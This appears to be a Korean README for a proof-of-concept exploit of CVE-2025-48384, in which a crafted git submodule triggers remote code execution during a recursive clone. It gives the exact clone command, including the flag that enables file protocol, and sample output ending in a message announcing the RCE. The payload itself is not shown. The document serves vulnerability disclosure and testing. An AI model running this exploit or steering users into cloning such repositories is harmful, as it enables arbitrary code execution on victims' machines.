
# 개념 증명 익스플로잇 `--recurse-submodules` 옵션을 사용한 clone 중에 조작된 git 서브모듈을 통해 원격 코드 실행을 시연하는 개념 증명 익스플로잇입니다. CVE-2025-48384를 대상으로 합니다.
참조: CVE-2025-48384
실행 방법:
git -c protocol.file.allow=always clone --recurse-submodules [email protected]:liamg/CVE-2025-48384.git
출력 예시:
git -c protocol.file.allow=always clone --recurse-submodules CVE-2025-48384 test
Cloning into 'test'...
done.
'ubmodule 'sub' ([email protected]:liamg/CVE-2025-48384-submodule.git) registered for path 'sub
'...ing into '/Users/liamg/test/sub
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
Uh-oh, this is an RCE!
실행된 페이로드는 여기에 있습니다.